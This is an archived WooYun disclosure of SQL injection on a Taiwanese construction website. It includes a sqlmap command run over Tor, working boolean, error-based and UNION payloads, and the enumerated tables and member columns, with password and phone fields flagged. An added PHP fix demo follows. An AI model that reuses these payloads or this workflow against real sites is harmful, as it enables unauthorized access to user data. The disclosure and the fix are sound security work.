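Vulnerability Summary

Bug ID: wooyun-2015-0159702

Title: SQL injection in Taiwan's 優築網 (affects over a thousand users) (Taiwan region)

Vendor: Taiwan 優築網

Author: 路人甲

Submitted: 2015-12-10 15:47

Fixed: 2016-01-28 17:39

Disclosed: 2016-01-28 17:39

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 10

Status: Handed over to a third-party partner organization (Hitcon Taiwan Internet vulnerability reporting platform) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]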


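Vulnerability Details

Disclosure status:

2015-12-10: Details reported to the vendor; awaiting vendor handling
2015-12-14: Vendor confirmed; details disclosed only to the vendor
2015-12-24: Details disclosed to core white hats and experts in related fields
2016-01-03: Details disclosed to regular white hats
2016-01-13: Details disclosed to trainee white hats
2016-01-28: Details disclosed to the public

Brief description:

SQL injection in Taiwan's 優築網

Detailed description:

SQL injection in Taiwan's 優築網

Proof of vulnerability: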

$ ./sqlmap.py --tor --tor-type=SOCKS5 --random-agent --time-sec=20 --technique=BEUS --union-char=N -u "**.**.**.**/01_case/01_case_00_overview.php?MainID=1" --dbs --is-dba --current-db
Parameter: MainID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: MainID=1' AND 7235=7235 AND 'SUmO'='SUmO
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: MainID=1' AND (SELECT 1443 FROM(SELECT COUNT(*),CONCAT(0x716b7a6271,(SELECT (ELT(1443=1443,1))),0x7176707a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'DEGx'='DEGx
Type: UNION query
Title: Generic UNION query (N) - 11 columns
Payload: MainID=1' UNION ALL SELECT 'N',CONCAT(0x716b7a6271,0x7361694776426169584f,0x7176707a71),'N','N','N','N','N','N','N','N','N'--
web application technology: Apache
back-end DBMS: MySQL 5.0
current database: 'vhost71706'
current user is DBA: False
Database: vhost71706
+------------------------+---------+
| Table | Entries |
+------------------------+---------+
| p_impeach_tb | 11628 |
| c_news | 9750 |
| c_build_img | 7646 |
| tb_sys_history | 5711 |
| c_news_b | 5077 |
| c_build_cdr | 4804 |
| c_build_tb | 3773 |
| hat_area | 3144 |
| c_build_sp | 1579 |
| c_member_tb | 1262 | =====> over 1,000 users
| c_contact | 935 |
| c_build_img_dir | 904 |
| c_build_direction_item | 843 |
| c_store_tb | 781 |
| p_city_tb | 389 |
| sys_city_tb | 387 |
| hat_city | 345 |
| p_fav_tb | 333 |
| c_build_question | 300 |
| unju_creation | 275 |
| role1 | 251 |
| c_forum_tb | 241 |
| m_cms | 239 |
| c_build_img_date | 237 |
| c_link | 103 |
| city_sory_detail | 99 |
<....>
Database: vhost71706
Table: c_member_tb
[46 columns]
+------------+---------------------+
| Column | Type |
+------------+---------------------+
| mid | bigint(10) unsigned |
| zaddress1 | text | ==> address
| zboss | varchar(50) |
| zchild | varchar(20) |
| zcity1 | varchar(20) |
| zcompany | text |
| zdate | datetime |
| zday | char(2) |
| zeditdate | datetime |
| zepaper | varchar(5) |
| zfirstname | text |
| zid | varchar(20) |
| zjob | bigint(5) |
| zjob2 | bigint(5) |
| zjobname | varchar(20) |
| zlink | text |
| zloginid | text | ==> user
| zlv | bigint(10) |
| zmail | varchar(100) |
| zmarry | varchar(20) |
| zmoney | varchar(20) |
| zmonth | char(2) |
| zmsn | text |
| zname | text |
| zorder | bigint(20) |
| zpassa | varchar(50) |
| zpassq | varchar(20) |
| zpasswd | text | ==> password
| zpic | varchar(50) |
| zpicsize | text |
| zprevid | bigint(10) |
| zschool | varchar(20) |
| zsex | varchar(20) |
| zsex2 | varchar(5) |
| zskype | text |
| zstate | varchar(5) |
| ztel | varchar(10) | ==> phone
| ztel2 | varchar(20) |
| ztel3 | text |
| ztel4 | text |
| ztel5 | text |
| ztel6 | text |
| ztitle | varchar(200) |
| zuserid | text |
| zyear | varchar(4) |
| zzone1 | varchar(10) |
+------------+---------------------+

Fix:

Filter the input.
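
One way to apply the fix to a numeric parameter like MainID, shown as an added example that is not code from the report or from the affected site. The table `demo_case`, its columns and both function names are hypothetical, and in-memory SQLite stands in for the site's MySQL so the script runs offline; validating the integer and binding it, rather than stripping quote characters, is this example's reading of the one-word fix.

```php
<?php
// Added example. demo_case and the function names are hypothetical;
// SQLite in memory stands in for MySQL so the script needs no server.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE demo_case (main_id INTEGER PRIMARY KEY, title TEXT)");
$pdo->exec("INSERT INTO demo_case VALUES (1, 'constructed sample row')");

// Vulnerable pattern: the request value is pasted into the SQL string,
// so anything after a quote character is parsed as SQL.
function find_case_unsafe(PDO $pdo, string $mainId): array
{
    $sql = "SELECT title FROM demo_case WHERE main_id = '$mainId'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened pattern: accept only a positive integer, then bind it as a
// typed parameter so the value can never become part of the statement.
function find_case_safe(PDO $pdo, string $mainId): array
{
    $id = filter_var($mainId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return [];  // reject outright instead of trying to clean the input
    }
    $stmt = $pdo->prepare('SELECT title FROM demo_case WHERE main_id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Regression inputs (constructed) in the shape of the boolean-based
// payload quoted in the proof above, with a true and a false condition.
$inputs = [
    'legitimate'      => '1',
    'condition true'  => "1' AND 7235=7235 AND 'SUmO'='SUmO",
    'condition false' => "1' AND 7235=7236 AND 'SUmO'='SUmO",
];
foreach ($inputs as $label => $value) {
    printf("%-16s unsafe=%d row(s)  safe=%d row(s)\n",
        $label,
        count(find_case_unsafe($pdo, $value)),
        count(find_case_safe($pdo, $value)));
}
```

The unsafe function's row count follows the injected condition, which is the signal a boolean-based test relies on; the safe function returns a row only for the plain integer.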

Copyright notice: when reposting, please credit the source 路人甲@乌云


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 17

Confirmed: 2015-12-14 22:59

Vendor reply:

Thank you for the report.

Latest status:

None